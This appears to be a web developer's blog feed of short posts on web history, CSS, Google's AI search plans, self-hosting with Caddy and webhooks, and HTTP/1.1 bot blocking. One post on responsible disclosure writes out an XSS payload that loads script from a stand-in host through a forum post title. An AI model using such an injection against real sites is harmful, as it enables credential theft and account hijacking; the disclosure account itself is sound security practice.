Around 1995 or so, a high schooler named Matt Wright decided to launch a website that shared some basic website tools that he
programmed. Many of these were dead-simple, things like contact forms, guestbooks, and web counters.
…
OMG I remember Matt’s Script Archive. I taught myself Perl with (among other things) his scripts.
I took his Counter/ImageCounter script and adapted it into my own FireCounter, which stitched together (non-animated) GIFs of digits (which I made using a filter in Corel Photo-Paint, I
think) into the kind of edgy hit counter I was into, back in the day.
This is a recreation. It probably looks better than the original!
Later, I even added parameter handling to allow the webmaster to specify a different set of digit images, and referrer detection so that it could track different sites:
each got its own text file with its count in it! For a while, a dozen or so of my friends had my counter visible on their Geocities and Angelfire pages!
I’m sure that my script had as many of the kinds of security vulnerabilities discussed in the linked article, if not more. But man, it felt like magic at the time!
The field-sizing property is coming to Firefox 152, making it available across all major engines. It allows
you to control the sizing behavior of elements with a default preferred size, such as form elements.
…
Sometimes a new CSS feature comes along and I immediately “get it”. Like: that’s a cool new feature, I can already see how it’ll save me time, or make things simpler, or improve
accessibility, or allow me to do something new.
Other times, like this one, I initially shrug. “What’s the point?” I think…
…and then later in the very same day find occasion to wish it was already mainstream. Hah!
For 25 years, Google Search was built on a contract. The web provided the content – billions of pages, freely linked, freely crawled. In return, Google sent people back. The link
was the unit of exchange. It’s what made the Web thrive as an information system: you publish, Google indexes, users click through, and value flows back to the source. Win-win.
That contract is now broken. Generative UI doesn’t link to your article, necessarily. It absorbs your article, synthesizes it into a
widget, and presents it as Google’s own answer. Information agents don’t send users to websites. They deliver “synthesized updates” with maybe a link or two buried at the bottom.
The web was the scaffolding Google needed to build its index, to train its models, to accumulate the world’s information, and put ads next to it to get filthy rich. Now that the
content is inside the system, the scaffolding is no longer needed. Google is creating its own context.
Google thinks it no longer needs the Web to deliver answers. And it no longer needs ad slots to deliver ads. What it needs is you. Your emails, your files, your calendar,
your purchase history, your travel plans – all flowing into Spark, all building the richest possible picture of who you are and what you’re likely to click on. That’s exactly the
kind of personal context those auction models need to work. The prediction module in the prominence allocation framework doesn’t run on keywords. It runs on knowing you.
…
An excellent piece by Matthias Ott, discussing revelations from this year’s Google I/O. In particular, the imminent pivot of Google Search from its lifelong “query in, list of links
out” model to a wholesale “query in, LLM output out” one.
This isn’t just about putting AI output at the top of the search results, as I gather they do today, but about getting rid of search “results” entirely, and
running everything through the model.
To which Matthias wisely asks: well, how will ads work then? Google’s business model is based on mining your personal data and shoving ads in your face. Where do they go in a search
interface that isn’t really a search but a “helpful” AI?
It turns out there are a few approaches that Google seem to be considering, but what they’ve all got in common is the idea that marketers will be able to “influence” the LLM’s token
generation: perhaps by using an LLM of their own to decide whether you (based on everything Google knows about you) are worth marketing to, and how much they’ll pay to do so, with
that input then being “weighted” against competing advertisers and actual ingested data in order to weave advertiser-influenced content directly into the output of the LLM.
Superficially, this sounds a little like product placement, like you sometimes see in American-made TV shows and movies. You know, where one character says “I’m going to go get a
drink refill. You know you can get unlimited refills on any drink you want… and it’s free?”, and the next says “It’s a wonderful restaurant.”, while they’re sitting in Burger King.
Except this isn’t about saying “hey, people who watch this show are probably high and want a snack, let’s push our fast food their way”. It’s individualised.
It’s more like if the characters, knowing that your Gmail account had a recent email about some test results and your Google Calendar had a doctor’s appointment tomorrow, started
talking about a particular brand of medication to, y’know, put the idea into your head.
The future presented in Futurama was supposed to be a joke, right?
We’re not at the point of completely-customised TV shows – nor the injection of commercials into dreams – yet. But Google’s plans, which blur the already-grey boundaries between organic
and advertising content, are pretty insidious.
Assuming you’re in their ecosystem already, and possibly even if you’re not… Google may already be looking at your search terms, your calendar, your emails, your location and schedule,
who you communicate with and how often, which web pages you visit, which apps you use, where you spend money, etc. (Seriously: if you somehow haven’t begun de-googling already, what are
you waiting for?)… there’s a huge potential for misuse there.
But the arms race between people blocking or learning-to-ignore ads and advertisers trying to foist them upon us continues, and Google thinks this is an acceptable next step in
escalating that: using an insane amount of energy to recycle other people’s work without crediting them, mashing up the result with information they know about you, in order to
deliver an unverifiable soup of words which might answer your question but gives no clue how much (or how little) commercial interest went into producing it, or whose interest it was.
That’s some proper Darkest Timeline shit, right there.
You don’t need to take my word or Matthias’s for it (although you should read his full post because it’s excellent): just look at the concept videos in Google’s blog post on the subject. You’ll also notice that almost nowhere
in their demos do Google even hint at the possibility of linking out to anybody else’s website: there’s like one “visit site” button that appears at the very end of
one of the flows, after the agent has done its thing. Google is building a walled garden where they hope you’ll live, served by their AI butler on behalf of the companies
who pay Google to tell you about their products.
This morning I had a lovely meeting with Andreas Marakis, who’s researching the sociological impact of the Web of the 1990s on
people who experienced it first-hand.
Anyway: chatting to Andreas was great and it reminded me of quite how grateful I am to have gotten to experience a lot of these seminal technologies when they were at their newest and
most-experimental.
When it first appeared, Google Search was a breath of fresh air. Simple, powerful search that Just Worked. It’s little wonder that the phrase “to Google” something became synonymous with
“to search for” something.
Somewhere, Google lost its way.1
Perhaps the latest example of that is the injection of AI into every search2:
I’ve been to the cinema a few times lately so I’ve seen the Google AI ad that inspired me to make this parody… a lot.
Music by Dead Tubes Foundation.
Apparently the kids these days don’t “Google it”. At least, not in their colloquialisms: they’re still probably using the search engine.
We should turn the verb use of googling into an insult.
Example: “That’s so unbelievable it sounds like you googled it.”
I love this, and I’m absolutely going to start using it. “To Google” can absolutely transform from meaning “to search for, using a Web search engine” to meaning:
to seek knowledge in a lazy and convenient way, without regard for its accuracy
(“I Googled from a guy at the pub that 5G caused Covid”)
to acquire information that can’t accurately be sourced or verified
(“don’t quote me on that, though: I Googled it”)
to prefer an answer to a question that’s mildly more-convenient for the asker, even if getting it was ethically problematic
(“pass me the jump leads, I’m going to Google one of the hostages”)
DeGoogling is so… 2010s. Let’s make the 2020s the decade where we redefine Google as a verb, in a way that better represents what it means to continue to buy into the
ever-increasingly toxic Google Search ecosystem.
2 Yes, I’m aware that some other search engines include AI summaries in results, too. But
they all seem easier to turn off… and I’m yet to see a cinema advertisement about the fact that they do it for anything other than Google Search.
Well this is a fun (and frustrating!) game. You’ll be presented with 20 (alleged) CSS properties, but some of them… are convincing-looking fakes! You’ve got 10 seconds to identify
whether each is real or not. Every few you get right increases the difficulty level, but also the score potential. How high can you score?
Me? Oh, I kept getting up into the “forbidden” level and then my brain would melt and I’d crash out. Quite proud of my last run, though:
Pushing to the main branch of my GitHub/Codeberg/wherever repo would send a webhook to my server.
Upon receiving the webhook, my server would pull the latest changes2.
Using a wildcard certificate, my webserver automatically mounts each project at a subdomain matching its project name3.
Here’s what I came up with:
Step 1: webhook handler
I’m using Caddy as my webserver, because despite its considerable power and versatility it’s a breeze
to set up. To sort wildcard DNS later I’ll want to swap in a custom build, but to get started I just ran apt install caddy. Then I used apt install webhook
to install Adnan Hajdarević’s webhook endpoint, and tied the two together in my Caddyfile:
My static server’s called duckling.danq.me, so you’ll see that turn up a lot in these configs.
Then I created a webhook in a GitHub repository:
I generated a long random string to use as the secret, and kept a copy for later.
When you create a webhook in GitHub it immediately sends a test event, but it doesn’t quite look like a real push event so I pushed an inconsequential change to the repo
to trigger another. Once you’ve got a “real” one sent, you can re-send it via the “Recent Deliveries” tab as many times as you like, to help with testing.
Then, on the server, I checked-out a copy of the code (anonymously: this is a public repository so I don’t need keys to read from it anyway) and set up my /etc/webhook.conf to expect
these calls:
The trigger-rule directives ensure that (a) the secret key is correct (it uses a HMAC hash across the entire JSON request, so it prevents payload tampering too) and
(b) the event only triggers on pushes to the main branch. The execute-command specifies the Bash script I want to run when the webhook is triggered. The
pass-arguments-to-command configuration says to send the repo name on to that script.
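To see what that HMAC check is actually comparing, it can help to reproduce GitHub’s signature by hand. Below is a minimal sketch. It assumes `openssl` is installed. GitHub sends an `X-Hub-Signature-256` header of the form `sha256=` followed by the hex HMAC-SHA256 of the raw request body, keyed with the webhook secret. The `github_signature` function is a hypothetical helper. It isn’t part of the webhook tool and isn’t how that tool performs its check internally.

```shell
# Hypothetical helper: compute the value GitHub would send in the
# X-Hub-Signature-256 header for a given secret and raw request body.
#   $1 = webhook secret
#   $2 = path to a file holding the exact request body, byte-for-byte
github_signature() {
  local digest
  # openssl prints e.g. "SHA2-256(stdin)= <hex>" (or "(stdin)= <hex>" on
  # older versions); awk keeps only the last field, the hex digest itself.
  digest=$(openssl dgst -sha256 -hmac "$1" < "$2" | awk '{print $NF}')
  printf 'sha256=%s\n' "$digest"
}
```

For example, `github_signature "$WEBHOOK_SECRET" payload.json` (both names hypothetical) should match the header on a delivery, but only if `payload.json` holds the body exactly as sent. Any re-indenting of the JSON changes the signature, which is precisely the tampering protection described above.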
Now all I needed to do was write the /var/www/github-push/webhook.sh Bash script so that it pulled the latest copy of the code when triggered:
#!/bin/bash
# Pull the latest changes into the checkout named by the first argument (the repo name)
cd "/var/www/github-push/$1" && git pull
I was able to test this by pushing inconsequential changes to my codebase and watching them get replicated down to my webserver. Neat!
Step 2: low-maintenance webserver
After pointing the DNS for *.static.duckling.danq.me at my static server, I set about configuring Caddy to be able to use DNS-01 challenges to get itself wildcard SSL
certificates4.
Caddy can’t do DNS-01 challenges out of the box, so you either need to write your own renewal script or compile Caddy with plugins corresponding to your DNS provider. My domains’ DNS
are managed by a mixture of AWS Route 53, Gandi, and Namecheap, so my xcaddy build step looked like this:
For Gandi and Namecheap I just need a personal access token or API key, respectively, but Route 53’s configuration is slightly more-involved: I needed to create a new user via IAM and
give it permission to write DNS TXT records for the appropriate hosted zone. Fortunately the guide for the
caddy-dns/route53 repo had an almost copy-pastable example.
I added the AWS access key and secret key as environment variables (like this!) into my
/etc/systemd/system/multi-user.target.wants/caddy.service service definition, and then told my Caddyfile to make use of them when renewing the wildcard certificate:
The {http.request.host.labels.4} placeholder refers to label number 4 of the domain name, when it’s split at the dots and counted from the right starting at zero: 0 = me, 1 =
danq, 2 = duckling, 3 = static, and 4 = the part that we’re interested in. So long as I don’t store any other directories in the
/var/www/github-push/ directory, this will simply map each subdomain onto its git repository name and return a 404 for any other request.
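To make that numbering concrete, here’s a small shell sketch that splits a hostname the same way. It’s an illustration only. `host_label`, `site_root` and `example-project` are made-up names, not part of Caddy.

```shell
# Hypothetical helper mirroring how {http.request.host.labels.N} numbers labels:
# split the hostname at the dots and count from the right, starting at 0.
#   $1 = hostname, $2 = label index N
host_label() {
  # Prints nothing if the hostname has too few labels for index N.
  printf '%s\n' "$1" | awk -F. -v n="$2" 'n < NF { print $(NF - n) }'
}

# Map a request hostname onto the directory it would be served from.
site_root() {
  printf '/var/www/github-push/%s\n' "$(host_label "$1" 4)"
}
```

So `site_root example-project.static.duckling.danq.me` yields `/var/www/github-push/example-project`.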
DNS-01 challenges are necessarily slower than HTTP-01/ALPN challenges, because they’re limited by DNS propagation, so it took a while before the
certificate was issued. I ran Caddy in the foreground to watch the logs while it did so:
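While waiting on a DNS-01 challenge, it can also help to check whether the challenge record has propagated yet. For a wildcard certificate the `*.` is dropped, and the TXT record lives at `_acme-challenge.` plus the rest of the name. Below is a minimal sketch. `acme_challenge_name` is a hypothetical helper, and the usage line assumes `dig` is installed.

```shell
# Hypothetical helper: the TXT record name an ACME DNS-01 challenge uses.
# A leading "*." (wildcard) is stripped before adding the _acme-challenge label.
acme_challenge_name() {
  printf '_acme-challenge.%s\n' "${1#\*.}"
}
```

For example, `dig +short TXT "$(acme_challenge_name '*.static.duckling.danq.me')"` shows the challenge token once it’s visible from your resolver. Adding `@1.1.1.1` or similar asks a specific public resolver instead.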
I don’t yet know if this is going to be the future forever-home of my many static site side projects, but it’s certainly been the most-satisfying experiment to run so-far.
Footnotes
1 I’ve drifted away from self-hosting simple static sites lately because I’ve accidentally
broken them with configuration changes too many times! But I figured I’d be open to in-housing them again if I had a single simple architecture for them all, so I spun up a VPS and
gave it a go.
2 Running a build script or some other static site generation tool is out of scope for
now, but I want to be able to confirm that it would be possible in the future.
3 It also needs to be possible for me to map other domain names to it, but that’s
a triviality.
4 It’s absolutely
possible to use tls { on_demand } to do this, but it’s better to use a wildcard certificate which can be pre-generated and doesn’t let people trick your
server into making ludicrous numbers of certificate requests by hammering random subdomain names.
Late to the party,1 I finally got around to experimentally moving a GitHub Pages-hosted static site to Codeberg. I wanted a low-risk site to try first, so I moved Beige Buttons, the site hosting my “90s PC turbo
button simulator” web component.
Mostly for my own benefit later, here are the steps I took and the things I learned along the way:
Codeberg Pages is deployed from the pages branch. If there’s no build step to the static site, all you need to do is rename the
main branch to pages (and probably make it the default branch).2
The default URL is https://username.codeberg.page/repository.
You can use a custom domain by adding a .domains file that lists domains; if migrating from GitHub Pages you can just rename your CNAME file to
.domains.
You’ll need to tweak your DNS CNAME or ALIAS (or,
worst-case, A/AAAA) record to point at Codeberg Pages.3
Change propagation feels slightly slower than GitHub, but perfectly tolerable.
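The repository-side steps above boil down to a couple of git commands. Here’s a minimal sketch. It assumes a site with no build step whose published branch is called `main`, possibly with a GitHub Pages `CNAME` file. `migrate_to_codeberg_pages` is a hypothetical name, and the push is left as a comment because it assumes a remote called `origin` that points at Codeberg.

```shell
# Sketch of the Codeberg Pages repo changes for a site with no build step.
# Run from inside the clone; assumes the published branch is currently "main".
migrate_to_codeberg_pages() {
  # Codeberg Pages deploys from the "pages" branch.
  git branch -m main pages || return 1
  # Codeberg reads custom domains from .domains rather than CNAME.
  if [ -f CNAME ]; then
    git mv CNAME .domains &&
      git commit -q -m "Rename CNAME to .domains for Codeberg Pages" || return 1
  fi
}
# Afterwards (assuming "origin" is the Codeberg remote), publish the branch:
#   git push -u origin pages
```

Making `pages` the default branch is then a setting in the repository’s settings on Codeberg, and the DNS change happens at your DNS provider, so neither appears here.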
The one thing that’s causing me trouble is that Codeberg Pages’ CORS headers prevent people from hotlinking the Beige Buttons JS, so there are some projects for which this
wouldn’t be a suitable migration (issues are raised). But for most static sites, it’d probably Just Work and seems to be a great alternative.
Two decades ago this month my friend Matt posted five predictions about the future of the world. I’ve revisited these predictions
twice since: ten years later and twenty years later, and “scored” his predictions both times.
I love that the Web’s memory (and the persistence of URLs) makes this kind of long-term conversation possible.
People being unwilling to discuss their wild claims, then later using the lack of discussion as evidence of widespread acceptance.
When people balance the new toilet roll one atop the old one’s tube.3
Come on! It would have been so easy!
Shellfish. Why would you eat that!?
People assuming my interest in computers and technology means I want to talk to them about cryptocurrencies.4
Websites that nag you to install their shitty app. (I know you have an app. I’m choosing to use your website. Stop with the banners!)
People who seem to only be able to drive at one speed.5
The assumption that the fact I’m “sharing” my partner is some kind of compromise on my part; a concession; something that I’d “wish away” if I could.
(It’s very much not.)
Brexit.
Wow, that was strangely cathartic.
Footnotes
1 I have a special pet hate for websites that require JavaScript to render their images.
Like… we’ve had the <img> tag since 1993! Why are you throwing it away and replacing it with something objectively slower, more-brittle, and
less-accessible?
2 Or, worse yet, claiming
that my long, random password is insecure because it contains my surname. I get that composition-based password rules, while terrible (even when they’re correctly
implemented, which they’re often not), are a moderately useful model for people to whom you’d otherwise struggle to
explain password complexity. I get that a password composed entirely of personal information about the owner is a bad idea too. But there’s a correct way to do this, and it’s not “ban
passwords with forbidden words in them”. Here’s what you should do: first, strip any forbidden words from the password: you might need to make multiple passes. Second, validate the
resulting password against your composition rules. If it fails, then yes: the password isn’t good enough. If it passes, then it doesn’t matter that forbidden words
were in it: a properly-stored and used password is never made less-secure by the addition of extra information into it!
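That strip-then-validate approach is simple enough to sketch. In the version below, the composition rules (at least 12 characters, at least one letter and one digit) and the function names are hypothetical examples. Matching is case-sensitive to keep it short.

```shell
# Strip forbidden words repeatedly: removing one occurrence (or one word) can
# reveal another, e.g. "smismithth" minus "smith" leaves "smith".
#   $1 = password; remaining args = forbidden words
strip_forbidden() {
  local pw="$1" prev word
  shift
  while :; do
    prev=$pw
    for word in "$@"; do
      [ -n "$word" ] || continue
      # Remove the first occurrence of $word until none remain.
      while case $pw in *"$word"*) true ;; *) false ;; esac; do
        pw=${pw%%"$word"*}${pw#*"$word"}
      done
    done
    # Stop once a full pass over every word changes nothing.
    [ "$pw" = "$prev" ] && break
  done
  printf '%s\n' "$pw"
}

# Hypothetical composition rules, applied to what's left after stripping.
meets_composition_rules() {
  local pw="$1"
  [ "${#pw}" -ge 12 ] || return 1
  case $pw in *[0-9]*) ;; *) return 1 ;; esac
  case $pw in *[A-Za-z]*) ;; *) return 1 ;; esac
}

password_acceptable() {
  local pw="$1"
  shift
  meets_composition_rules "$(strip_forbidden "$pw" "$@")"
}
```

With this sketch, `password_acceptable 'Xk9#smith-Qr7vLp2w' smith` succeeds, because what remains without the surname still passes the rules. `password_acceptable 'smith2024smith' smith` fails, because only `2024` is left.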
My recent post How an RM Nimbus Taught Me a Hacker Mentality kickstarted several conversations, and I’ve enjoyed talking to people about the “hacker
mindset” (and about old school computers!) ever since.1
Thinking “like a hacker” involves a certain level of curiosity and creativity with technology. And there’s a huge overlap between that outlook and the attitude required to
be a security engineer.
By way of example: I wrote a post for a Web forum2
recently. A feature of this particular forum is that (a) it has a chat room, and (b) new posts are “announced” to the chat room.
It’s a cute and useful feature that the chat room provides instant links to new topics.
The title of my latest post contained a HTML tag (because that’s what the post was talking about). But when the post got “announced” to the chat room… the HTML tag seemed to have
disappeared!
And this is where “hacker curiosity” causes a person to diverge from the norm. A normal person would probably just say to themselves “huh, I guess the chat room doesn’t show HTML
elements in the subjects of posts it announces” and get on with their lives. But somebody with a curiosity for the technical, like me, finds themselves wondering exactly
what went wrong.
It took only a couple of seconds with my browser’s debug tools to discover that my HTML tag… had actually been rendered to the page! That’s not good: it means that, potentially, the
combination of the post title and the shoutbox announcer might be a vector for an XSS attack. If I wrote a post with a title of, say, <script
src="//example.com/some-file.js"></script>Benign title, then the chat room would appear to announce that I’d written a post called “Benign title”, but anybody viewing it
in the chat room would execute my JavaScript payload3.
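The usual fix for this class of bug is to escape a title before inserting it into the page. That way the browser displays the markup as text rather than acting on it. Below is a minimal sketch of that escaping in shell. The forum’s real stack isn’t something I know, `html_escape` is a hypothetical name, and in practice you’d reach for your templating language’s built-in escaping rather than rolling your own.

```shell
# Hypothetical helper: escape the characters that are significant in HTML text
# and attribute values. "&" is replaced first so that the entities produced by
# the later substitutions aren't escaped a second time.
html_escape() {
  printf '%s' "$1" | sed \
    -e 's/&/\&amp;/g' \
    -e 's/</\&lt;/g' \
    -e 's/>/\&gt;/g' \
    -e 's/"/\&quot;/g' \
    -e "s/'/\&#39;/g"
}
```

Fed the example title above, this produces `&lt;script src=&quot;//example.com/some-file.js&quot;&gt;&lt;/script&gt;Benign title`, which a browser shows literally instead of loading the script.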
I reached out to an administrator to let them know. Later, I delivered a proof-of-concept: to keep it simple, I just injected an <img> tag into a post title and, sure
enough, the image appeared right there in the chat room.
Injecting an 88×31 seemed like a less-disruptive proof-of-concept than, y’know, alert('xss'); or something!
This didn’t start out with me doing penetration testing on the site. I wasn’t looking to find a security vulnerability. But I spotted something strange, asked
“what can I make it do?”, and exercised my curiosity.
Even when I’m doing something more formal, and poking every edge of a system to try to find where its weak points are… the same curiosity still sometimes pays dividends.
And that’s why you need that mindset in your security engineers. Curiosity, imagination, and the willingness to ask “what can I make it do?”. Because if you don’t find the loopholes,
the bad guys will.
Footnotes
1 It even got as far as the school run, where I ended up chatting to another parent about
the post while our kids waited to be let into the classroom!
2 Remember forums? They’re still around, and – if you find one with the right group of
people – they’re still delightful. They represent the slower, smaller communities of a simpler Web: they’re not like Reddit or Facebook where the algorithm will always find something
more to “feed” you; instead they can be a place where you can make real human connections online, so long as you can deprogram yourself of your need to have an endless-scroll of
content and you’re willing to create as well as consume!
3 This, in turn, could “act as” them on the forum: for example, attempting to steal their
credentials or making them post messages they didn’t intend to; or, if they were an administrator, taking more-significant actions!
Most of the traffic I get on this site is bots – it isn’t even close. And, for whatever reason, almost all of the bots are using HTTP1.1 while virtually all human traffic is using
later protocols.
I have decided to block v1.1 traffic on an experimental basis. This is a heavy-handed measure and I will probably modify my approach as I see the results.
…
# Return an error for clients using http1.1 or below - these are assumed to be bots
@http-too-old {
	not protocol http/2+
	not path /rss.xml /atom.xml # allow feeds
}
respond @http-too-old 400 {
	body "Due to stupid bots I have disabled http1.1. Use more modern software to access this site"
	close
}
This is quick, dirty, and will certainly need tweaking but I think it is a good enough start to see what effects it will have on my traffic.
…
A really interesting experiment by Andrew Stephens! And love that he shared the relevant parts of his Caddyfile: nice to see how elegantly this can be achieved.
I decided to probe his server with cURL:
~ curl --http0.9 -sI https://sheep.horse/ | head -n1
HTTP/2 200
~ curl --http1.0 -sI https://sheep.horse/ | head -n1
HTTP/1.0 400 Bad Request
~ curl --http1.1 -sI https://sheep.horse/ | head -n1
HTTP/1.1 400 Bad Request
~ curl --http2 -sI https://sheep.horse/ | head -n1
HTTP/2 200
Curiously, while his configuration blocks both HTTP/1.1 and HTTP/1.0, it doesn’t seem to block HTTP/0.9! Whaaa?
It took me a while to work out why this was. It turns out that cURL won’t do HTTP/0.9 over https:// connections. Interesting! Though it presumably wouldn’t have worked
anyway – HTTP/1.1 requires (and HTTP/1.0 permits) the Host: header, but HTTP/0.9 doesn’t IIRC, and sheep.horse definitely does require the Host: header (I tested!).
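The Host: difference is easier to see when you look at what each version actually puts on the wire. Below is a minimal sketch. `raw_request` is a hypothetical helper that only prints request bytes for a simple `GET /`. HTTP/0.9 has no headers at all, so there’s simply nowhere to put a Host: header.

```shell
# Hypothetical helper: print the raw request a client would send for "GET /".
#   $1 = hostname, $2 = protocol version (0.9, 1.0 or 1.1)
raw_request() {
  case $2 in
    # HTTP/0.9: a bare request line, with no version token and no headers.
    0.9) printf 'GET /\r\n' ;;
    # HTTP/1.0: headers exist, but Host isn't required (many clients send it anyway).
    1.0) printf 'GET / HTTP/1.0\r\nHost: %s\r\n\r\n' "$1" ;;
    # HTTP/1.1: Host is mandatory.
    1.1) printf 'GET / HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' "$1" ;;
    *) echo "unsupported version: $2" >&2; return 1 ;;
  esac
}
```

To try one by hand over TLS, you could pipe it into OpenSSL: `raw_request sheep.horse 1.1 | openssl s_client -quiet -connect sheep.horse:443 -servername sheep.horse`. How any given server answers a 0.9-style request is another matter.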
I also tested that my RSS reader FreshRSS was still able to fetch his content. I have it configured to pull not only the RSS feed, which is specifically allowed to bypass his
restriction, but – because his feed contains only summary content – I also have it fetch the linked page too in order to get the full content. It looks like FreshRSS is using HTTP/2 or
higher, because the content fetcher still behaves properly.
Andrew’s approach definitely excludes Lynx, which is a bit annoying and would make this idea a non-starter for any of my own websites. But it’s still an interesting experiment.
The <geolocation> element provides a button that, when activated, prompts the user for permission to access their location. Originally, it was designed as a
general <permission> element, but browser vendors indicated that implementing a “one-size-fits-all” element would be too complex. The result was a single-purpose
element, probably the first of several.
<geolocation><strong>Your browser doesn't support <geolocation>. Try Chrome 144+</strong></geolocation>
…
I’ve been waiting for this one. Given that “requesting permission to access a user’s location” has always required user intervention, at least to begin with, it makes
sense to me that it would exist as a form control, rather than just as a JavaScript API.
Implementing directly in HTML means that it degrades gracefully in the standard “if you don’t understand an element, simply render its contents” way that the Web always has. And
it’s really easy to polyfill support in for the new element so you can start using
it today.
My only niggle with <geolocation> is that it still requires JavaScript. It feels like a trick’s been missed, there. What I’d have really wanted would
have been <input type="geolocation">. This would, for example, render as a button but, when clicked (and permission granted), get the user’s device location and fill the
field (presumably with a JSON object including any provided values, such as latitude, longitude, altitude, accuracy, provider, and so on). Such an element would still provide
all the same functionality of the new element, but would also be usable in a zero-JS environment, just like <input type="file">, <input
type="datetime-local"> and friends.
This is still a huge leap forward and I look forward to its more-widespread adoption. Meanwhile, I’ll be looking into both integrating it into existing applications that use geolocation
and using it in future applications, in preference to the old API-driven approach. I’m grateful to Manuel for sharing what he’s learned!
Highlight of my workday was debugging an issue that turned out to be nothing like what the reporter had diagnosed.
The report suggested that our system was having problems parsing URLs with colons in the pathname, suggesting perhaps an encoding issue. It wasn’t until I took a deep dive into the logs
that I realised that this was a secondary characteristic of many URLs found in customers’ SharePoint installations. And many of those URLs get redirected. And SharePoint often uses
relative URLs when it sends redirections. And it turned out that our systems’ redirect handler… wasn’t correctly handling relative URLs.
It all turned into a hundred line automated test to mock SharePoint and demonstrate the problem… followed by a tiny two-line fix to the actual code. And probably the
most-satisfying part of my workday!
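The general shape of that bug is worth illustrating. A relative `Location` header has to be resolved against the URL that was requested, not fetched as-is. The system in question isn’t described here, so below is only a simplified shell sketch of the idea. `resolve_location` and the example URLs are hypothetical. The sketch doesn’t normalise `.` or `..` segments, and real code should lean on a proper URL library.

```shell
# Resolve a redirect's Location value against the URL that was requested.
#   $1 = requested URL, $2 = Location header value
resolve_location() {
  local base="$1" loc="$2" scheme rest origin path
  # Absolute URL: only if the text before "://" is a plausible scheme.
  case $loc in
    *://*)
      case ${loc%%://*} in
        '' | *[!A-Za-z0-9+.-]*) ;;   # not a scheme, e.g. "next?u=https"
        *) printf '%s\n' "$loc"; return 0 ;;
      esac ;;
  esac
  scheme=${base%%://*}              # e.g. "https"
  rest=${base#*://}                 # e.g. "example.com/sites/team/page.aspx?x=1"
  origin="$scheme://${rest%%/*}"    # e.g. "https://example.com"
  case $loc in
    //*) printf '%s:%s\n' "$scheme" "$loc" ;;   # scheme-relative
    /*) printf '%s%s\n' "$origin" "$loc" ;;     # absolute path, colons and all
    *)                                           # relative to the base's directory
      case $rest in
        */*) path=/${rest#*/} ;;
        *) path=/ ;;
      esac
      path=${path%%[?#]*}           # drop any query string or fragment
      printf '%s%s/%s\n' "$origin" "${path%/*}" "$loc" ;;
  esac
}
```

For instance, a redirect to `other.aspx` from `https://example.com/sites/team/page.aspx?x=1` resolves to `https://example.com/sites/team/other.aspx`, rather than being treated as a complete URL on its own.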
Have you ever wished there were more to the internet than the same handful of apps and sites you toggle between every day? Then you’re in for a treat.
Welcome to the indie web, a vibrant and underrated part of the internet, aesthetically evocative of the late 1990s and early 2000s. Here,
the focus is on personal websites, authentic self-expression, and slow, intentional exploration driven by curiosity and interest.
These kinds of sites took a backseat to the mainstream web around the advent of big social media platforms, but recently the indie web has been experiencing a
revival, as more netizens look for connection outside the walled gardens created by tech giants. And with renewed interest comes a new generation of website
owner-operators, intent on reclaiming their online experience from mainstream social media imperatives of growth and profit.
…
I want to like this article. It draws attention to the indieweb, smolweb, independent modern personal web, or whatever you want to call it. It does so in a way that
inspires interest. And by way of example, it features several of my favourite retronauts. Awesome.
But it feels painfully ironic to read this article… on Substack!
Substack goes… let’s say half-way… to representing the opposite of what the indieweb movement is about! Sure, Substack isn’t Facebook or Twitter… but it’s still very much in
the same place as, say, Medium, in that it’s a place where you go if you want other people to be in total control of your Web presence.
The very things that the author praises of the indieweb – its individuality and personality, its freedom from control by opaque corporate policies, its separation from the “same
handful of apps and sites you toggle between every day” – are exactly the kinds of things that Substack fails to provide.